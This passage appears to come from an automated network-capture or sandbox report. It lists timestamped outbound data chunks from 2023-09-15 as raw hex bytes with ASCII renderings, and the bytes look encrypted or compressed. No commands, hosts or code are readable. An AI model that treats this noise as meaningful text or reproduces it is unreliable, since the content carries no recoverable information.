                                                                                                                                                                    Data Ascii: GJHm.qZzky/~j'7NzU.U6tnCO^{KFI$bR_vSb]JPMv[}QxR{Eu!*\`?G1<7m>9<DHwNsv+Q%W~\YoJX,O[*YrNInDG>6> ThX/:2
                                                                                                                                                                    2023-09-15 20:16:20 UTC48OUTData Raw: 63 9a 23 d2 84 41 9f cd cc ab 02 58 90 15 40 4b 26 42 9e a1 3a 56 10 18 dd 81 50 17 bf 60 d5 f8 19 83 33 0c 4e 83 b0 84 c9 d4 2e 36 1e ec 9c 33 14 68 31 10 88 05 b6 f3 eb f3 28 73 ac de 9e eb 20 e4 1a 61 26 b5 ec ec f3 75 47 4a 87 a6 2d 51 b0 64 04 d6 ee a3 48 68 ac 20 68 5f ed 39 07 1c 1e 99 75 25 d0 28 0a 48 97 e4 69 5d ea 18 29 00 08 58 5a 33 a7 eb 6c ca 7d f4 05 f5 f4 fb 25 1a 7d 2d da 2a 89 4d db 33 4f ce 6a 76 38 6d 23 af 16 47 e4 d1 13 92 03 fb 91 b3 a5 3f 3e 59 5e 8c d1 e4 89 ad 7d 86 5c 37 af 7c b0 b3 b8 c5 a9 50 86 3f 7c 4c 08 26 a3 09 71 64 73 0a 3b a8 81 2e f8 9a b4 ab ab 73 f4 b6 9b 25 98 f4 35 33 5d 60 b8 d4 23 ea b8 d5 ff 98 5c cd 44 14 c2 6c b0 f1 50 12 66 10 1f 80 c1 9f 6e 8f e7 4d 98 b0 a9 93 f5 83 c1 c9 fa 9c 31 e0 d1 1d b1 d5 e5 00 0e
                                                                                                                                                                    Data Ascii: c#AX@K&B:VP`3N.63h1(s a&uGJ-QdHh h_9u%(Hi])XZ3l}%}-*M3Ojv8m#G?>Y^}\7|P?|L&qds;.s%53]`#\DlPfnM1
                                                                                                                                                                    2023-09-15 20:16:20 UTC64OUTData Raw: c7 17 84 61 a8 24 0d c2 7e a6 97 8c 9f 85 5a d8 73 ea 77 8e 89 b6 22 08 8f 10 db d2 d5 69 ee 43 a0 23 2f a0 42 07 b9 e1 6b a1 fe 0e 5b fd 13 50 33 05 9c 9a df 76 aa ec 2d 0e 70 23 71 04 37 a0 c7 a4 87 fd 3f ea f6 df 55 22 b5 1c c7 cb 68 e3 87 8d 51 72 14 2b c7 bd be c0 17 a0 76 f2 55 1b c4 e9 d4 04 e4 b0 cb 04 f3 ae e9 b5 23 8e 33 33 2f 1e 7f 0b 65 85 91 f2 52 71 38 6a e2 1c 9a ca a7 e4 73 59 bb e0 53 df 58 fc 32 25 5e 92 76 09 80 c9 1f 56 61 31 3a 81 59 8e e9 ab f7 4c 80 c2 d5 43 dd e5 05 06 2f 33 9d 42 46 c9 bf cc 63 c4 0c 36 07 85 b6 ec 6a e3 1e 92 6c 5f 2b b5 a1 64 9e a3 4a 25 aa 4d 20 b8 15 f3 3f 40 e4 ed 80 bf c6 06 ab ba 9e eb 6e ef 17 18 7d cf b5 a3 bc 6f 99 52 42 49 6c a0 cd ef b4 99 98 c0 ba 9a 26 a5 75 f1 b9 04 06 9d 3e ca 36 c6 0b 9d 0e b3 15
                                                                                                                                                                    Data Ascii: a$~Zsw"iC#/Bk[P3v-p#q7?U"hQr+vU#33/eRq8jsYSX2%^vVa1:YLC/3BFc6jl_+dJ%M ?@n}oRBIl&u>6
                                                                                                                                                                    2023-09-15 20:16:20 UTC80OUTData Raw: b0 d6 ab e4 a5 5d 51 0b ad e4 24 ec 8b c1 42 ff 0f 75 98 62 69 25 0a 3c c0 dd 23 2c 49 92 f8 7a 46 19 f8 c3 e1 30 59 87 c4 a9 ab 98 9e 83 b0 66 93 bc 75 88 ee 67 8f 35 e2 25 04 31 3e 01 60 cb 17 a4 8a 34 82 cc c4 51 3e b1 c9 59 9f b5 f3 3f fb 85 a0 0c b4 7f 47 61 55 1b 51 42 a8 f1 ca de b7 9f 6c ae db 86 46 89 ba 43 26 0f 3a d9 55 ed 75 f1 d6 a0 2d db 75 5e ff 7a b4 bd 6f 0f 46 47 37 73 c6 7b 2e 64 6a c1 52 ee 79 83 fc 41 9b b0 c9 06 f1 f3 31 f9 ac 5c b2 44 d9 d1 c0 11 a9 00 08 66 fd 53 54 eb 1b b7 dc 6a b6 21 b0 82 f7 04 08 d7 c1 9e 74 fa 30 34 99 7c ad 61 6c b3 fd 23 30 a2 60 ca b9 8b 58 84 b3 9f f3 de 7d e1 fb a0 fb 00 82 78 fc 2f d0 88 a5 0a e0 da a8 85 18 90 ef 10 76 88 6a 50 7f f2 80 cc 16 40 16 b9 60 ab 63 6f 06 b7 63 b3 a6 b4 37 9d 26 ce 47 8d 0c
                                                                                                                                                                    Data Ascii: ]Q$Bubi%<#,IzF0Yfug5%1>`4Q>Y?GaUQBlFC&:Uu-u^zoFG7s{.djRyA1\DfSTj!t04|al#0`X}x/vjP@`coc7&G
                                                                                                                                                                    2023-09-15 20:16:20 UTC96OUTData Raw: 3b 60 32 41 b7 45 68 0e d3 8d 17 2d ff e1 86 9f b2 33 ab 94 0c 3b 6f 66 b8 b9 3b 0d 89 fc c8 0e 75 15 90 d8 f4 77 9c ac f0 cd cd 44 1c a6 29 a6 85 55 c4 d6 c8 b7 f7 76 a2 9a a6 57 b8 86 3e d8 18 6d b9 1b 1f ae aa 08 4f 75 fd 36 1f 9f d6 03 e6 d3 1b 59 d1 78 ef 95 01 68 53 04 f8 5a f1 f9 4f dd 1e 38 eb fc 25 18 64 89 c0 b9 55 98 7b a8 d5 79 3b 44 72 61 1c 35 75 d0 b1 86 83 15 ad 5f 82 32 25 6f 86 70 a2 54 13 5e e6 66 9b 49 db 36 d6 8f fc 12 00 53 06 93 ea f6 3b ee 44 40 ab 51 df 60 ad 7f 63 28 a7 08 6c 98 be 34 6d 73 c4 35 a9 b0 04 8c d3 bf 11 bb 86 db a6 a4 c8 3b db ea cc c8 a7 cd 1e cb 5c 04 90 24 98 d5 58 de 9c 3a 4c 58 9a 01 fb 79 8e 61 92 5e a6 e5 91 e0 bc 3e 50 b3 8b 57 88 18 3a 1a 89 98 77 b2 98 1a a9 f4 5e 03 a6 7c 57 5e a2 89 14 8a 05 17 5d 9f a8
                                                                                                                                                                    Data Ascii: ;`2AEh-3;of;uwD)UvW>mOu6YxhSZO8%dU{y;Dra5u_2%opT^fI6S;D@Q`c(l4ms5;\$X:LXya^>PW:w^|W^]
                                                                                                                                                                    2023-09-15 20:16:20 UTC112OUTData Raw: ea ee 11 8f ef 10 e7 56 b9 65 57 07 95 25 69 6d 53 97 d0 4a e6 bb f8 01 1f e3 22 41 41 47 03 c0 04 93 7e cb ba f2 de 8f fb 75 3a d9 7a 72 ab 49 fd 5b ff 37 5b fa 46 00 65 00 ae 12 cf e9 9b 9c 77 28 d8 2b 31 a2 f7 37 cb 9c 74 09 38 3a 75 a6 bc 23 76 88 b6 14 9c 6c 7a 7e b7 1a 34 ae e3 a1 19 7b 55 1a 68 a2 f1 ed eb 88 35 af 49 2f 0c bf 81 39 82 f7 8a 1e 69 8b 81 1a ad 31 bb df 2f ec 8b 8b bc da 1b 8c 5b ce d5 9e e6 6e 3e 0e 1b 63 52 02 ce c3 cc 48 27 68 cc c4 0f d8 94 45 55 67 90 52 b7 96 89 e5 8f 1f 19 e7 b1 e2 06 23 20 9a b3 4b 87 94 8a dc 1c 00 b9 b4 d5 16 1a 61 ba 85 60 21 15 f2 0d 18 67 3e 47 62 c9 2d 48 9b 23 c0 0f 88 de 3b 08 7b 52 3d b3 a5 dc 89 7a fc 05 e0 f6 88 7f d0 3a bb 7f 91 41 d6 8f 34 42 f5 ad 8e 80 c1 d9 6e 22 22 74 e2 d7 2d 32 17 5f 1f 14
                                                                                                                                                                    Data Ascii: VeW%imSJ"AAG~u:zrI[7[Few(+17t8:u#vlz~4{Uh5I/9i1/[n>cRH'hEUgR# Ka`!g>Gb-H#;{R=z:A4Bn""t-2_
                                                                                                                                                                    2023-09-15 20:16:20 UTC128OUTData Raw: 26 de 7a 01 68 b8 50 3b 27 3b d5 f1 cd d1 9a af b4 31 fe c0 7e 18 85 fe 1a ca 50 46 88 9b b2 7d 71 75 07 89 4a ad 27 64 7c ba 51 c3 c2 d5 70 19 2f e7 09 54 62 4a 76 2e e5 d9 fd 23 ae b4 ea 39 16 91 92 1c 3f 32 03 18 20 66 95 88 3e c1 7e fd b1 c3 d4 5c a8 39 b8 7d bf 71 10 5c cd 8b 37 54 0e 9f ec 0c 56 a9 ab 09 50 65 1d 17 85 0f e7 f0 f8 5a fa 3b 47 3d b1 3f 0d e7 91 74 37 1a 68 fc ff f0 6e b8 02 d8 40 6b 6c 8f 51 b5 34 be d1 ce af c3 db db be ef 55 73 1d cf 5c fa 70 49 b6 21 f3 06 99 b7 2b a8 13 9e 5a 62 3d f4 ba 12 48 2e e3 72 0f f2 07 9b 62 3e 7c ec 85 65 0e 72 e5 80 1e 31 70 b6 1c f1 5b b7 54 2e f8 22 cd fa 65 27 26 9f 80 84 2c 0d 8d 50 77 f5 27 a7 1c 31 16 57 5a 9a 5a ea eb 6e c3 24 a0 11 ac 5c 99 d0 11 dc 98 f7 85 6e a7 d9 53 26 ff be 0a 69 d4 cb 49
                                                                                                                                                                    Data Ascii: &zhP;';1~PF}quJ'd|Qp/TbJv.#9?2 f>~\9}q\7TVPeZ;G=?t7hn@klQ4Us\pI!+Zb=H.rb>|er1p[T."e'&,Pw'1WZZn$\nS&iI
                                                                                                                                                                    2023-09-15 20:16:20 UTC144OUTData Raw: 41 9f fc 2d ca ed ff e7 17 17 32 db aa da 5a 87 ef 52 8d 65 59 7f e7 d2 37 19 30 9b 58 e9 3e 82 07 8e 65 f3 09 5d ae 2e 89 dd 36 66 5d 4f 29 03 ef 2b 8d 00 fd b5 09 f1 36 0d c0 d3 8e 1b c6 57 51 9f c8 ba e0 8e d4 e3 57 c1 7f 91 72 ea 0e ec 23 98 c5 46 df 18 02 52 df 14 55 9f 70 34 e8 a2 f8 28 28 c5 f2 d0 7c 50 8a 34 8b 6f b6 e4 d5 bf 93 03 88 58 24 97 57 24 36 4f 9e 0d f3 7d 89 42 94 b7 73 96 cf fb 6c 82 4a 2e 58 25 f8 8a 45 1c 27 b0 18 13 c9 a4 ad f3 dd 14 b9 ae 1a 6f 19 3d 8d ce a8 34 0f b8 c3 b9 a8 89 c4 72 47 e7 bd 14 8b 50 bc 93 41 18 17 b4 f5 53 d5 55 c7 f2 c8 41 9a 9a 54 55 f1 00 f1 ed 9d 24 14 72 66 b6 ce 5f df c0 26 50 c9 65 ee be 29 d3 d4 17 cb 41 e4 fb 58 5e 25 fa 0d af 8e 4b 0d 78 3b dc 5e 02 96 0f bb 13 be 52 a0 99 74 6d 32 83 9a cd 95 0c ce
                                                                                                                                                                    Data Ascii: A-2ZReY70X>e].6f]O)+6WQWr#FRUp4((|P4oX$W$6O}BslJ.X%E'o=4rGPASUATU$rf_&Pe)AX^%Kx;^Rtm2
                                                                                                                                                                    2023-09-15 20:16:20 UTC160OUTData Raw: 4d 76 06 1b bd 9c 0d 5c 11 cd 20 5a 0d 22 ab a8 51 51 88 be 45 f6 c8 a0 f7 ab 5e ea ad 1b 58 96 19 c4 8d c5 28 9f 7a 6c 59 3c 3f 7f da 73 a0 1f 63 0f c8 e6 f0 fb 2f bf a9 ee 07 f6 ec ae ba 83 99 fe 35 12 31 51 e9 3a a1 01 fb e1 8b 59 4a f3 36 41 2a fa 3e 8e 88 4e 18 a2 1b 80 d0 89 13 8f d0 22 b5 42 36 81 c8 93 39 9d e5 b4 aa ac 39 7c 6a 0c e2 e4 5a d1 51 22 7c 31 1e 72 35 98 16 3b 12 07 40 ad 28 ae 05 1b f2 47 b7 4d 8a 3b b1 88 70 b0 da 59 8b 46 22 04 52 74 62 28 be 41 de 5b 6b d6 41 c9 a0 fe fa 06 32 52 89 a6 b6 08 c9 a0 62 ce 2d 3d d9 bd 56 6b be 77 44 3f c9 29 42 9e 73 45 33 bb ba 3b 2a eb bc 15 09 7a c6 fc 05 59 69 b3 98 eb 74 aa 3f 22 c3 1f e8 ee 5a 69 3f e3 03 9e 52 06 2f df d5 2b 23 28 c6 d2 e0 1f 6a bd 6b ef 19 5e 5e 09 e9 ec fb bb b4 54 e1 b9 57
                                                                                                                                                                    Data Ascii: Mv\ Z"QQE^X(zlY<?sc/51Q:YJ6A*>N"B699|jZQ"|1r5;@(GM;pYF"Rtb(A[kA2Rb-=VkwD?)BsE3;*zYit?"Zi?R/+#(jk^^TW
                                                                                                                                                                    2023-09-15 20:16:20 UTC176OUTData Raw: 0f 61 fa a9 1a a4 67 ed 73 29 ee a0 9c 05 36 95 3e 6e fe 26 00 63 ad e1 86 d3 47 9d f3 bf b0 f2 f3 f1 c1 4d 66 07 46 ef 6b 20 25 9f b3 be 5e e0 62 b2 64 87 a7 99 cb 2f c1 27 2a 6f 08 c2 ec b6 16 90 67 b7 c9 f7 6a 9f cd 7e db 49 ef 5a 6a 9a 2c bc 79 12 88 79 6c 00 3f ab d3 e8 08 4d 93 61 18 1a 26 ea cc 00 0f 46 ea c4 3f 33 3e 81 a6 ad a2 c6 2a 66 fd 2c d4 a1 ab ff 80 ff db 1a 6f 8e 16 d3 ee 54 46 6c d8 13 06 97 a8 cd 79 05 c4 0f e6 1a cf d2 dd c2 27 a5 e3 5e 38 c5 88 57 14 da fb 75 11 03 ee 1a 54 de d2 e0 81 d4 7a 7b f1 a0 fe 1d 7e a0 1d 74 d4 c3 db 6f 87 11 4d 64 bb a2 d9 a4 79 84 59 ca 4d f2 3b 08 a0 ae 0c 2c af 06 4e 2c e8 b1 f7 fe ea 1a 94 b4 e4 35 2f b0 9e 1d 10 78 49 52 d1 36 31 1e 37 c7 e5 8c 58 f6 66 41 8b de b9 b0 a4 8f 55 96 ef e9 5c ce a1 eb 10
                                                                                                                                                                    Data Ascii: ags)6>n&cGMfFk %^bd/'*ogj~IZj,yyl?Ma&F?3>*f,oTFly'^8WuTz{~toMdyYM;,N,5/xIR617XfAU\
                                                                                                                                                                    2023-09-15 20:16:20 UTC192OUTData Raw: e0 9c d9 17 de 27 a0 df 04 0b ff 77 5d 21 82 36 f9 39 68 64 22 ba 03 0e 8a 8d 45 54 ba 6a 72 73 e3 25 b8 12 08 2d 9c 6c 85 45 b5 2f 58 e2 41 3b 52 ca 65 b6 b8 93 e9 b5 2e f6 ea e6 13 c6 91 80 60 fd dd 84 bc f2 a8 0b 80 4e e2 65 2a c3 b6 7c 20 35 c7 35 11 58 29 01 10 e7 e7 03 4f d0 0e 76 de 9c 3a e7 20 17 25 6e 8e 2e 82 ee ed e4 b6 a6 d5 f1 58 4f 71 a1 4a 48 8a 6d 6d 0b 4b 84 8f a5 c5 bb 54 45 39 ae 37 84 a0 f7 c6 06 67 3e 30 d7 af 1e 99 46 ad d8 56 61 9a f2 f6 f3 a1 c1 41 79 d1 61 e4 fd 0d cd 87 88 d2 19 40 15 bb 8a 40 85 5d 36 09 ff b5 d3 81 b4 06 8f 97 06 5b be 08 d8 10 bc 3a 30 96 65 7a 81 20 f5 82 83 1e e5 51 89 64 a4 aa 82 cf 26 3a 6b 60 62 b6 99 07 e3 92 e6 fa cb e0 b8 20 31 d3 0a 55 b8 21 61 0f 87 2b 06 a4 ef ad 5c 1c 47 82 9b c4 93 d8 77 76 24 b4
                                                                                                                                                                    Data Ascii: 'w]!69hd"ETjrs%-lE/XA;Re.`Ne*| 55X)Ov: %n.XOqJHmmKTE97g>0FVaAya@@]6[:0ez Qd&:k`b 1U!a+\Gwv$
                                                                                                                                                                    2023-09-15 20:16:20 UTC208OUTData Raw: 0a 1d 75 52 a4 34 ef be ea fd 96 59 0e 35 f7 bc e9 9a 3c b1 fa 30 ad d8 19 e1 4f 57 de 6a 7a a3 f9 36 bc 76 9d dc 79 3d 16 02 4d c6 f4 c7 50 33 58 40 f8 10 ce 9c dc be 3b c3 4d da 59 42 79 6d c9 96 fa 4f 10 4f 92 ed 0f 4a 5c fe 78 61 28 4b b5 cd 46 af 86 d7 09 62 fb 8c f4 e3 26 cb 0e 33 c8 72 39 51 69 86 9c c6 31 ae fd df 6f 7c 6e 60 76 e4 b7 bc 73 b0 89 e8 f1 1b ce 04 5c b4 01 88 c4 99 05 08 e0 f3 3b eb 48 0a 07 65 28 fa ec ed 4c 3a ab d6 0c b4 6b f2 1b 94 a9 1d 48 8a ca 5b 42 09 c3 b4 ea 8d 68 de 5d 9c 49 64 5b 0d fa b4 2d 7d ff 46 df d3 56 9a 36 3b 34 19 6d b7 22 03 3e 28 49 ce 6a c9 d8 88 83 d1 2b 96 bf bc bf 68 7b c8 e4 ef ec cc 2e af fc 4f 81 85 75 d4 a7 42 9e f9 3d a1 38 ae 34 e1 8d ab e3 b9 43 85 db e2 3e 1e d4 52 85 41 fe 30 59 2b c3 a1 0f 81 ed
                                                                                                                                                                    Data Ascii: uR4Y5<0OWjz6vy=MP3X@;MYBymOOJ\xa(KFb&3r9Qi1o|n`vs\;He(L:kH[Bh]Id[-}FV6;4m">(Ij+h{.OuB=84C>RA0Y+
                                                                                                                                                                    2023-09-15 20:16:20 UTC224OUTData Raw: df 8d 05 e4 4f 18 9e 4d 44 12 b9 b2 b3 a2 1d 10 b6 df e0 95 0b 7c e6 4f 07 d6 e9 94 72 c6 3d 0e d2 71 8d 02 f0 0b fd e5 c3 11 e1 ed 71 d9 e9 48 03 5a e7 f7 e6 5c fd 9a ab 4c e2 87 ff 37 c0 51 f5 c1 b1 16 68 9c 76 f2 00 2a 77 43 f5 5a a4 b8 12 89 9b 16 8f db 91 94 bb f6 b9 13 22 76 79 b4 0f b5 15 7a a6 44 f4 f5 a5 64 c7 39 d1 b1 57 28 69 78 80 3f dd 84 1c 4f 2b e8 39 6d 13 12 e1 d9 0d fc 94 61 95 16 20 5f 12 3e f7 f8 f1 5b 45 63 23 84 fd ef 80 13 6f f2 f0 82 cd 5f ba ac 40 12 db 1f 1b d8 e4 b4 ae f5 23 43 f1 f4 55 ff 95 7f 83 cf fd 39 f0 91 b3 de d9 79 d0 01 1e 44 c9 84 f8 b8 5e 29 d6 61 62 3c 19 5b 43 3e 37 6b ea 50 ad a8 25 e9 e0 b6 19 37 5d c4 c5 8b 3d ae 1b 5d c2 ab e6 aa 7a 0a c1 97 56 dc cf c9 1d e4 62 74 e7 2a 3b 8d 68 52 da bd 4d 65 82 34 39 1b 26
                                                                                                                                                                    Data Ascii: OMD|Or=qqHZ\L7Qhv*wCZ"vyzDd9W(ix?O+9ma _>[Ec#o_@#CU9yD^)ab<[C>7kP%7]=]zVbt*;hRMe49&
                                                                                                                                                                    2023-09-15 20:16:20 UTC240OUTData Raw: 78 c8 1f 24 93 b3 87 5a 22 55 29 e3 58 97 d3 8d 86 a9 cf 8b c5 9c ee 0c f5 4b 52 3d ec 3c 87 08 cc 6c c9 ac 6d aa 89 46 35 3d ba d2 f5 b3 82 1a a7 e3 32 f9 a2 c0 f0 33 45 f5 ba e9 d3 83 d1 8a e9 26 c1 00 8f da 1d bb 06 ba 08 f9 51 e3 e3 e8 32 bb e2 38 a2 f2 5e 95 d6 e4 a3 70 02 f6 31 91 2e 7e c8 14 58 fa c5 e5 df 1c c9 5d 6a 6f 91 df ed 24 b7 67 be d2 66 cc 62 9a 2b 2f c9 3c f8 dc d8 f3 42 09 90 24 7b 5e a2 34 b8 92 de e6 65 71 2d 51 24 5c 06 fa 31 d3 61 d2 a8 19 b6 e4 a1 c4 6b 3e bb cf bd 9c 85 39 37 b1 60 1f f1 7c e3 b1 44 3f 71 88 35 d1 52 4d 3f 0a 81 b3 af 06 0c cd 9c 81 ae c6 33 00 5a 1a d0 f8 b0 24 62 c5 a6 67 51 db 52 0f 09 46 76 bc b5 4f 69 77 17 06 4d 61 45 02 9a 6e 63 75 d2 df 0d 21 f1 5c d8 9e 72 37 7f 62 87 c9 a7 83 4b cc ef 8d af 10 01 03 f9
                                                                                                                                                                    Data Ascii: x$Z"U)XKR=<lmF5=23E&Q28^p1.~X]jo$gfb+/<B${^4eq-Q$\1ak>97`|D?q5RM?3Z$bgQRFvOiwMaEncu!\r7bK
                                                                                                                                                                    2023-09-15 20:16:20 UTC256OUTData Raw: 0b 98 24 aa 5f 7b 70 89 ed eb 4f 8c d8 58 0a 38 f1 1e 41 7d 23 e1 62 bc 78 d6 81 e8 54 b2 7c 1c 56 5b 12 a5 6a 43 76 ec 4d 97 f5 c2 bf b2 57 d2 48 0c 51 b6 66 e3 90 46 e7 8d d8 a9 6e a1 48 a9 55 35 94 fe 60 08 0b ef c5 b3 c1 5a 98 28 dc 30 76 2b 31 7b 7c a3 f8 94 38 74 40 22 f9 d0 a0 d8 2e 64 74 25 10 a0 86 4a 05 2c 95 e1 6b ba 0d 1e 5a df d2 df 1b 49 c1 16 0f 75 f5 ef 1c fd 6a 03 9c ff d9 82 22 90 52 a5 35 fb 07 55 2b bc 84 ba fb da ca b4 56 ef 53 05 d1 fe b0 b6 e5 b7 08 e7 fe f5 94 e8 f5 9f 57 49 93 4e 63 61 ad 8a 8a 6d 3e 68 5c b6 d7 6c 2d 19 4c 16 c4 29 58 1e 89 68 8f 5e b4 7e fe 5d 84 5c f2 09 3e 63 28 f6 2a a9 6e 56 59 af 14 ab 63 09 11 43 ae d0 19 60 98 67 11 a1 8b 44 1b 98 a1 48 44 8c 18 ab 46 c8 8f 91 ac 31 1e 7d 88 0c 03 dd 17 ff 52 c9 b1 77 0b
                                                                                                                                                                    Data Ascii: $_{pOX8A}#bxT|V[jCvMWHQfFnHU5`Z(0v+1{|8t@".dt%J,kZIuj"R5U+VSWINcam>h\l-L)Xh^~]\>c(*nVYcC`gDHDF1}Rw
                                                                                                                                                                    2023-09-15 20:16:20 UTC272OUTData Raw: 10 14 ee e1 66 bf 60 9b 38 64 1f 70 48 a2 32 e7 b5 9b 0c d5 13 84 ad 1a ed 80 e9 10 9e 37 20 a9 90 5c fa af b3 9a 92 a4 f6 93 02 8c 13 96 cf 7b ee f2 85 61 a6 44 5f 0d cc 4f d4 f1 0b ba 0e f7 bc c9 26 f3 98 31 83 77 12 a9 00 bf 59 28 56 31 9f 67 dc 95 72 9a e9 c1 e8 44 ac 07 58 4e 7b c1 f8 0d a0 4a 48 7f fd 2a b9 40 55 c9 9b 85 75 c3 8b cc a8 ce ad 1e e1 69 5f 00 f2 c6 69 40 ff 4b 52 d4 f3 57 d7 35 57 8c 7e 5d e9 94 1d 30 f5 6c a6 96 d3 4e a6 db 9b 95 6b 79 5c 32 5a 2e 00 2a 9e bb 76 4c c0 35 6e 47 ed 84 7e b7 52 0d 9a 4f a2 bb a1 25 a5 53 e0 01 c5 51 b0 37 39 d0 c1 12 ef 9b 3e 5e d8 61 ab 51 cf 3d 31 9f 66 89 9f 3c a9 47 09 01 fd 72 58 41 a4 15 84 53 7d 58 ed 58 90 b1 57 e8 c2 e8 d4 de f4 28 11 9c 60 24 1a 75 13 b5 3d 2d bf 6e f4 ba ca f0 70 54 9c be b5
                                                                                                                                                                    Data Ascii: f`8dpH27 \{aD_O&1wY(V1grDXN{JH*@Uui_i@KRW5W~]0lNky\2Z.*vL5nG~RO%SQ79>^aQ=1f<GrXAS}XXW(`$u=-npT
                                                                                                                                                                    2023-09-15 20:16:20 UTC288OUTData Raw: 2a 63 61 58 76 c9 d6 c5 be 20 cf 49 9e ac 24 41 61 9a c1 20 a3 cf 7f c4 f2 a9 3e f9 fd cf 46 88 56 47 78 52 7b 46 b8 93 58 11 71 50 44 96 64 d8 c4 be ef 04 ad 8d 37 ce 66 bb 0a 0a 32 0b d3 f4 0f 62 83 08 4a 99 bd 2a ef 54 a3 0c 3e ab d8 fd 07 14 40 c0 d4 30 8c 56 80 bb 40 80 92 ba b7 1a 61 85 0e d9 3d 9d 1c c4 f7 52 b3 c4 a5 1d 48 d6 6e a8 6f cd 38 e6 f3 d8 a6 dc 8a e6 9f ac f6 48 51 f8 ae 95 45 fb 91 43 11 18 9f db 43 5e 11 93 d9 6b 4a 2c 1f 48 3b f5 34 90 8c 12 0b 1b 2a 27 ed 35 1b 60 7f fe 18 b6 8b 72 27 a8 25 fd f3 31 03 d3 b8 b5 2d 43 89 d3 8e a5 08 b6 ea 60 29 b2 c1 69 70 7d 5e e4 f0 9b 9a 2a 2a ba e1 17 f0 18 23 41 78 be 62 32 32 26 2b f7 e8 2a b2 88 c1 96 45 db 0f 9b 06 f3 c4 30 ef a8 13 9b 52 b8 d9 3b 63 c0 8f 70 c9 b3 1d 64 4c 42 c3 97 64 c8 48
                                                                                                                                                                    Data Ascii: *caXv I$Aa >FVGxR{FXqPDd7f2bJ*T>@0V@a=RHno8HQECC^kJ,H;4*'5`r'%1-C`)ip}^**#Axb22&+*E0R;cpdLBdH
                                                                                                                                                                    2023-09-15 20:16:20 UTC304OUTData Raw: bf cc d2 e9 97 61 5a 69 7c 1f 9d 8a 81 9a f3 7d 4a 30 6e 85 bb f7 b4 34 f4 4f 5e df 06 68 5e 53 93 e8 d6 bc 0b af d3 74 4b d3 b2 7e c4 bc 7e 04 e3 6e 9b 3c 2b be b2 2e b6 8e 28 21 ad 31 5d 93 35 a5 d1 76 ee 18 53 af 39 27 46 6d 05 d0 84 0c 2a 98 f8 88 71 a1 44 51 5e 8f 2d 7b 13 f4 61 8e 14 e8 8f 38 d9 2a d8 70 1f 44 2c 6c a2 bf 1f 06 56 90 23 76 0d 58 45 2f c1 76 8f a2 cc bc 9d e0 e5 c4 f8 ef bd 8f c0 8b 5c a7 1b 70 b7 dc 1d de 6b 7f 0c 0b 77 77 ad 96 bb 43 33 e4 14 34 6b ab a8 82 fb 92 b2 4a e7 b4 63 41 a9 51 53 d7 99 a1 46 84 08 b6 79 05 b5 6c d1 9f b6 01 f9 75 70 e9 8b b4 02 70 82 b4 d6 4c 8a 71 eb 98 06 4e ee ad 24 b8 9a 4f 61 61 0a 53 93 7f 23 b5 3a b2 ad 9e 6d f0 9f 4f 9b 6e b7 b8 f0 6d 7e 59 36 e7 8d 76 fd 11 8a 5f b5 0d c8 24 26 86 e5 c8 5c 63 ec
                                                                                                                                                                    Data Ascii: aZi|}J0n4O^h^StK~~n<+.(!1]5vS9'Fm*qDQ^-{a8*pD,lV#vXE/v\pkwwC34kJcAQSFyluppLqN$OaaS#:mOnm~Y6v_$&\c
                                                                                                                                                                    2023-09-15 20:16:20 UTC320OUTData Raw: 2f cf fe b7 79 90 d3 a5 ae 7e 52 af c3 4c 61 58 7b 6c 38 f7 d2 ea 8f a3 83 a5 da 30 8a f2 33 21 c0 b1 8e 78 ce 7f f4 c3 d2 43 62 e9 53 52 ef d2 5b 24 c0 1e a3 2c ac e8 d1 49 85 67 56 e9 5b 8c 86 81 d1 63 9c 15 83 bc 77 3f bc b2 b5 59 9c 0a d9 9a 90 01 8a e4 9d 44 d6 09 a6 1b ce e7 f6 2b 0c 53 39 ce 47 43 2b 71 da d0 77 29 a0 ec 72 c8 8f da 60 74 06 96 cd 78 46 cf 78 f0 e6 46 77 0b 4d 78 84 94 45 3d 69 02 58 d5 df 17 af 72 0d ac c0 a1 c2 23 ca 5e b6 26 87 f7 83 b2 f6 6a fe bb e1 90 ee 80 25 e3 90 ee 15 f5 ff 85 56 ae 32 c5 2d 8b 11 f5 0e fc b8 3e d6 27 da e4 3a 6e c5 b8 95 4c c5 f4 64 28 45 82 58 49 c8 f0 02 8b 26 69 5b 51 0b f6 1f 81 ce 3a 36 0f 13 c6 9c 93 41 5e f0 1a 30 ab 62 3a dd 47 46 3c f6 99 74 9a 08 ce 35 50 f4 12 d4 c4 61 ed 42 8b 5d 8f 0d 43 34
                                                                                                                                                                    Data Ascii: /y~RLaX{l803!xCbSR[$,IgV[cw?YD+S9GC+qw)r`txFxFwMxE=iXr#^&j%V2->':nLd(EXI&i[Q:6A^0b:GF<t5PaB]C4
                                                                                                                                                                    2023-09-15 20:16:20 UTC336OUTData Raw: cf 34 ef 02 72 a2 d6 a0 e6 37 d6 3e 31 34 12 c6 f1 35 4e 0d 15 29 af 67 54 75 fc 67 08 0e b5 46 0b ac 2b 37 d9 36 f0 c1 81 ab b6 19 95 91 96 09 0c b7 40 b2 2c b2 64 dd eb 54 20 fb 5e 67 9c f7 2b 96 8f eb 63 26 45 6f a6 3e 0a f8 65 77 94 38 f6 55 70 67 67 fd 54 28 eb a8 51 24 a5 c3 c6 8d c1 17 a0 80 32 91 52 4e cf a3 75 c4 a8 fb 59 cb e5 f9 b0 3e 39 00 94 29 4f ac d3 96 ce 2b de 8d 47 fc b5 6b 92 6c 15 a0 9f da 28 22 63 5f cc d1 bb fa 3e c9 81 3c b3 23 a4 4e cf e4 60 e4 67 9a 94 02 c9 97 03 75 66 36 80 42 d6 b1 cb 4f 4e c6 7e 26 d5 54 05 65 57 77 33 fe 4b 43 0d 12 16 c2 22 a8 74 4d 3c 65 0a 55 1a 68 b7 c8 9b df 32 f9 99 60 da 02 e5 5e 20 0d d7 a8 9b 93 43 25 79 72 b4 41 51 93 b7 d1 b5 7b f2 90 82 e5 86 8b e7 38 de c0 c8 57 67 bb 56 0d 75 28 b7 9f c5 dd df
                                                                                                                                                                    Data Ascii: 4r7>145N)gTugF+76@,dT ^g+c&Eo>ew8UpggT(Q$2RNuY>9)O+Gkl("c_><#N`guf6BON~&TeWw3KC"tM<eUh2`^ C%yrAQ{8WgVu(
